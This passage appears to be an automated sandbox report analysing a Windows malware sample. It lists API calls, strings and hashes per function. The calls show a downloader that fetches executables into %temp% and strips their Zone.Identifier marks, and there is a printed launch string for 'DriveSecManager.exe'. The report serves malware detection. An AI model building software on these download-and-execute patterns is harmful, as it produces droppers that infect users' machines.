                                                                                                                    • htons.WS2_32(?), ref: 00401508
                                                                                                                    • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                                                                                                    • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                                                                                      • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
                                                                                                                      • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
                                                                                                                      • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4174406920-0
                                                                                                                    • Opcode ID: 13d0b41af5316ea83091654edbd74b2561ef0770db19727e5a4322e68b78e0ff
                                                                                                                    • Instruction ID: 37c3663fbc3c265b2fc21df898a790ae91858f9cd77d7d33374cf85f68206479
                                                                                                                    • Opcode Fuzzy Hash: 13d0b41af5316ea83091654edbd74b2561ef0770db19727e5a4322e68b78e0ff
                                                                                                                    • Instruction Fuzzy Hash: 0331C871A443016BE320DF649C46F9BB6E0AF48B10F50493DF655EB2D0D3B5D544879A
                                                                                                                    Function 0040CCF0 Relevance: 9.1, APIs: 6, Instructions: 67sleepnetworkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetTickCount.KERNEL32 ref: 0040CD02
                                                                                                                    • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040CD28
                                                                                                                    • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040CD5F
                                                                                                                    • GetTickCount.KERNEL32 ref: 0040CD74
                                                                                                                    • Sleep.KERNEL32(00000001), ref: 0040CD94
                                                                                                                    • GetTickCount.KERNEL32 ref: 0040CD9A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CountTick$Sleepioctlsocketrecv
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 107502007-0
                                                                                                                    • Opcode ID: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                                                                    • Instruction ID: 0ae774020e9f5877292fe20f0fc2b5ec497076074ae846a5bd2c446efb985cc9
                                                                                                                    • Opcode Fuzzy Hash: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                                                                    • Instruction Fuzzy Hash: 4431FC74900209EFCB04DFA8D988BEE7BB1FF44315F10867AE825A7290D7749A51CF95
                                                                                                                    Function 00406460 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0040646B
                                                                                                                    • CoCreateInstance.OLE32(00412438,00000000,00000001,00412418,?), ref: 00406483
                                                                                                                    • wsprintfW.USER32 ref: 004064B6
                                                                                                                    Strings
                                                                                                                    • %comspec%, xrefs: 004064BF
                                                                                                                    • /c start %s & start %s\DriveSecManager.exe, xrefs: 004064AA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateInitializeInstancewsprintf
                                                                                                                    • String ID: %comspec%$/c start %s & start %s\DriveSecManager.exe
                                                                                                                    • API String ID: 2038452267-3640840557
                                                                                                                    • Opcode ID: 4992a1b2003cae7c91a3a7b86177e2a1dc405837f2ddce0001cb864d4f031ccd
                                                                                                                    • Instruction ID: 827debbb99fb5d40cfb779b5d8ae5ab415415813199b490bc36420c15ce2df05
                                                                                                                    • Opcode Fuzzy Hash: 4992a1b2003cae7c91a3a7b86177e2a1dc405837f2ddce0001cb864d4f031ccd
                                                                                                                    • Instruction Fuzzy Hash: 0C31D875A40208BFDB04DF98D884FDEB7B5EF88704F208199F619A73A4C674AE81CB54
                                                                                                                    Function 0040AA80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • htons.WS2_32(00000050), ref: 0040AAAD
                                                                                                                      • Part of subcall function 0040AA40: inet_addr.WS2_32(0040AAC1), ref: 0040AA4A
                                                                                                                      • Part of subcall function 0040AA40: gethostbyname.WS2_32(?), ref: 0040AA5D
                                                                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 0040AACD
                                                                                                                    • connect.WS2_32(000000FF,?,00000010), ref: 0040AAE6
                                                                                                                    • getsockname.WS2_32(000000FF,?,00000010), ref: 0040AB18
                                                                                                                    Strings
                                                                                                                    • www.update.microsoft.com, xrefs: 0040AAB7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                                                    • String ID: www.update.microsoft.com
                                                                                                                    • API String ID: 4063137541-1705189816
                                                                                                                    • Opcode ID: 17f60f9418bba267ceb1c0f8ef6a4cf2a322d26a33b8be3941e3699853ecfadc
                                                                                                                    • Instruction ID: 53d455f177803832f36bb1991f027e84745f2e467cc2e97abaa02536582c95dc
                                                                                                                    • Opcode Fuzzy Hash: 17f60f9418bba267ceb1c0f8ef6a4cf2a322d26a33b8be3941e3699853ecfadc
                                                                                                                    • Instruction Fuzzy Hash: 09210BB5E103099BCB04DFE8D946AEEBBB5AF4C300F104169E605F7390E7745A45CBAA
                                                                                                                    Function 0040F0B1 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 195nativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • NtQueryVirtualMemory.NTDLL ref: 0040F162
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MemoryQueryVirtual
                                                                                                                    • String ID: oA$ oA$ oA
                                                                                                                    • API String ID: 2850889275-3725432611
                                                                                                                    • Opcode ID: 2b8d52b38e95f23bdc674a950ebd3d706a7c1f13ecb44ec4cb7d27a974556661
                                                                                                                    • Instruction ID: 156301bb8e4ac48afa8ff6eb2b3679a4760495b1ce114817f826733a91984271
                                                                                                                    • Opcode Fuzzy Hash: 2b8d52b38e95f23bdc674a950ebd3d706a7c1f13ecb44ec4cb7d27a974556661
                                                                                                                    • Instruction Fuzzy Hash: 3561D635710612CFDB35CE29C88066A33A2EB85354B25857FD805EBAD5E73ADC4AC68C
                                                                                                                    Function 0040BE80 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26encryptionCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CryptAcquireContextW.ADVAPI32(Bz@,00000000,00000000,00000001,F0000040,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BE93
                                                                                                                    • CryptGenRandom.ADVAPI32(Bz@,?,00000000,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BEA9
                                                                                                                    • CryptReleaseContext.ADVAPI32(Bz@,00000000,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BEB5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                    • String ID: Bz@
                                                                                                                    • API String ID: 1815803762-793989200
                                                                                                                    • Opcode ID: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                                                                    • Instruction ID: 6606508483a264dc8c12e3925f56bba8ecc3e33b87176868a4d93c44792bd7d2
                                                                                                                    • Opcode Fuzzy Hash: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                                                                    • Instruction Fuzzy Hash: 87E01275650208BBDB24CFD1EC49FDA776CEB48700F108154F70997280DBB5EA4097A8
                                                                                                                    Function 004013B0 Relevance: 6.1, APIs: 4, Instructions: 63networkthreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040D55D,00000000), ref: 004013D5
                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                                                                    • bind.WS2_32(?,?,00000010), ref: 00401429
                                                                                                                      • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
                                                                                                                      • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
                                                                                                                      • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3943618503-0
                                                                                                                    • Opcode ID: 68d947c41bdf9a0382415b4c621d22e40d460daea97f1b1ba8e6dd9fd87ffbf0
                                                                                                                    • Instruction ID: f9ba2cfc99a050ce4a8bfcbff2653574801cca82506c6568c29975d90a0f09d7
                                                                                                                    • Opcode Fuzzy Hash: 68d947c41bdf9a0382415b4c621d22e40d460daea97f1b1ba8e6dd9fd87ffbf0
                                                                                                                    • Instruction Fuzzy Hash: 61118974A417106FE320DF749C0AF877AE0AF04B54F50892DF699E72E1E3B49544879A
                                                                                                                    Function 00401C50 Relevance: 6.1, APIs: 4, Instructions: 59networksleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                                                                                                    • WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
                                                                                                                    • Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
                                                                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Recv$ErrorLastSleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3668019968-0
                                                                                                                    • Opcode ID: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                                                                    • Instruction ID: 470b9b0004fc9485880b3b0232d8394a6163a25caab740c915041083b8486df8
                                                                                                                    • Opcode Fuzzy Hash: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                                                                    • Instruction Fuzzy Hash: 8811AD72148305AFD310CF65EC84AEBB7ECEB88710F40092EF945D2150E6B9E949A7B6
                                                                                                                    Function 0040D4A0 Relevance: 3.0, APIs: 2, Instructions: 15timenativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • NtQuerySystemTime.NTDLL(0040B3B5), ref: 0040D4AA
                                                                                                                    • RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$QuerySecondsSince1980System
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1987401769-0
                                                                                                                    • Opcode ID: 5c98a04c039906c0b732b0f639c8761212275eae2c79c402d7dd6553d16f435e
                                                                                                                    • Instruction ID: 284f4c0ca90a751934941b1d9bfeddc82ee070f17a0c71d7a2ad06256d95dcf5
                                                                                                                    • Opcode Fuzzy Hash: 5c98a04c039906c0b732b0f639c8761212275eae2c79c402d7dd6553d16f435e
                                                                                                                    • Instruction Fuzzy Hash: 71D0C779D4010DBBCB00DBE4E84DCDDB77CEB44201F0086D6ED1593150EAB06658CBD5
                                                                                                                    Function 00404090 Relevance: 1.7, Strings: 1, Instructions: 488COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 0-3916222277
                                                                                                                    • Opcode ID: 758c8ddec5ebc3f2fbc60252ee954f274e779d6146799bd0d90b894ddaeb8b1a
                                                                                                                    • Instruction ID: 5fd1260cd0c1bb1f0d43ca887b35fd9fe7aa376b80e30ba4f5f1b1723d8df557
                                                                                                                    • Opcode Fuzzy Hash: 758c8ddec5ebc3f2fbc60252ee954f274e779d6146799bd0d90b894ddaeb8b1a
                                                                                                                    • Instruction Fuzzy Hash: 2C124FF5D00109ABCF14DF98D985AEFB7B5BB98304F10816DE609B7380D739AA41CBA5
                                                                                                                    Function 00409EE0 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetProcessHeaps.KERNEL32(000000FF,?), ref: 00409EFC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HeapsProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1420622215-0
                                                                                                                    • Opcode ID: 1373c558315c2bb7b1b39264dd611deb399c5604e49ba0dd3c9b15e56f9cb6f7
                                                                                                                    • Instruction ID: 8d4b3b75e0ca4951d81b7fee5ffefe8b4dae6978097e516d12ce04c36a2bdc79
                                                                                                                    • Opcode Fuzzy Hash: 1373c558315c2bb7b1b39264dd611deb399c5604e49ba0dd3c9b15e56f9cb6f7
                                                                                                                    • Instruction Fuzzy Hash: 6B01ECB4904219CADB248F14D9847A9B778AB44304F1081E6D709B7282C2B85ECACF5E
                                                                                                                    Function 0040A500 Relevance: .4, Instructions: 371COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7a4742e2e7356186e64ac596d0aac80efded56b294b4881e2932ca283d7c95dd
                                                                                                                    • Instruction ID: ad55d0a0fc81490cd0e7a8c39e77b8496904da2014b800c37f86947748ff7242
                                                                                                                    • Opcode Fuzzy Hash: 7a4742e2e7356186e64ac596d0aac80efded56b294b4881e2932ca283d7c95dd
                                                                                                                    • Instruction Fuzzy Hash: DA128CB4D002199FCB08CF99D991AEEFBB2BF88304F24856AE415BB345D334AA15CF54
                                                                                                                    Function 0040EE74 Relevance: .1, Instructions: 77COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 055ce3a16072e11c5b5b43c4deef216cb34a050bfe9534eea9d89275913ec06d
                                                                                                                    • Instruction ID: 054a0bb403a3dad9bf0ef84f7a0700921875b898f10d87bbce24b5acd7998093
                                                                                                                    • Opcode Fuzzy Hash: 055ce3a16072e11c5b5b43c4deef216cb34a050bfe9534eea9d89275913ec06d
                                                                                                                    • Instruction Fuzzy Hash: 4721B872900205AFC710EF79C880967FBA5FF45310B45857EE9559B286E734F925C7E0
                                                                                                                    Function 0040EAE0 Relevance: 72.0, APIs: 34, Strings: 7, Instructions: 227filenetworksleepCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetTickCount.KERNEL32 ref: 0040EAE9
                                                                                                                    • srand.MSVCRT ref: 0040EAF0
                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040EB10
                                                                                                                    • strlen.NTDLL ref: 0040EB1A
                                                                                                                    • mbstowcs.NTDLL ref: 0040EB31
                                                                                                                    • rand.MSVCRT ref: 0040EB39
                                                                                                                    • rand.MSVCRT ref: 0040EB4D
                                                                                                                    • wsprintfW.USER32 ref: 0040EB74
                                                                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040EB8A
                                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EBB9
                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EBE8
                                                                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040EC1B
                                                                                                                    • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040EC4C
                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040EC5B
                                                                                                                    • wsprintfW.USER32 ref: 0040EC74
                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EC84
                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 0040ECA5
                                                                                                                    • ExitProcess.KERNEL32 ref: 0040ECCD
                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040ECE3
                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040ECF0
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040ECFD
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040ED0A
                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040ED15
                                                                                                                    • rand.MSVCRT ref: 0040ED2A
                                                                                                                    • Sleep.KERNEL32 ref: 0040ED3B
                                                                                                                    • rand.MSVCRT ref: 0040ED41
                                                                                                                    • rand.MSVCRT ref: 0040ED55
                                                                                                                    • wsprintfW.USER32 ref: 0040ED7C
                                                                                                                    • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040ED99
                                                                                                                    • wsprintfW.USER32 ref: 0040EDB9
                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EDC9
                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 0040EDEA
                                                                                                                    • ExitProcess.KERNEL32 ref: 0040EE11
                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EE20
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Internetrand$CloseDeleteHandleSleepwsprintf$ExitOpenProcess$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                                                                                                    • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$]u@
                                                                                                                    • API String ID: 3709769524-1557916875
                                                                                                                    • Opcode ID: cde54363ed6e66bf7c32733fe20a8141ebc92d2c64877f6f05ce73e4651f385c
                                                                                                                    • Instruction ID: cec73e08c6f056f0168379cb50c3066ff26982e4471096ca0769119a3115f73e
                                                                                                                    • Opcode Fuzzy Hash: cde54363ed6e66bf7c32733fe20a8141ebc92d2c64877f6f05ce73e4651f385c
                                                                                                                    • Instruction Fuzzy Hash: 5E81E9B5900318ABE720DB61DC49FEA3379AB88701F0484FDF609A51C1DAB99BD4CF59
                                                                                                                    Function 0040AEA0 Relevance: 34.7, APIs: 13, Strings: 10, Instructions: 198stringCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 459 40aea0-40aeb7 call 40add0 462 40aeb9 459->462 463 40aebe-40aeda call 40aa20 strcmp 459->463 464 40b145-40b148 462->464 467 40aee1-40aefd call 40aa20 strstr 463->467 468 40aedc 463->468 471 40af40-40af5c call 40aa20 strstr 467->471 472 40aeff-40af1b call 40aa20 strstr 467->472 468->464 477 40af5e-40af7a call 40aa20 strstr 471->477 478 40af9f-40afbb call 40aa20 strstr 471->478 479 40af3b 472->479 480 40af1d-40af39 call 40aa20 strstr 472->480 487 40af9a 477->487 488 40af7c-40af98 call 40aa20 strstr 477->488 489 40afbd-40afd9 call 40aa20 strstr 478->489 490 40affe-40b014 EnterCriticalSection 478->490 479->464 480->471 480->479 487->464 488->478 488->487 498 40aff9 489->498 499 40afdb-40aff7 call 40aa20 strstr 489->499 491 40b01f-40b028 490->491 495 40b059-40b064 call 40b150 491->495 496 40b02a-40b03a 491->496 507 40b13a-40b13f LeaveCriticalSection 495->507 508 40b06a-40b078 495->508 500 40b057 496->500 501 40b03c-40b055 call 40d4a0 496->501 498->464 499->490 499->498 500->491 501->495 507->464 511 40b07a 508->511 512 40b07e-40b08f call 409d90 508->512 511->512 512->507 515 40b095-40b0b2 call 40d4a0 512->515 518 40b0b4-40b0c4 515->518 519 40b10a-40b122 515->519 520 40b0d0-40b108 call 40a1b0 518->520 521 40b0c6-40b0ce Sleep 518->521 522 40b128-40b133 call 40b150 519->522 520->522 521->518 522->507 527 40b135 call 40ab80 522->527 527->507
                                                                                                                    APIs
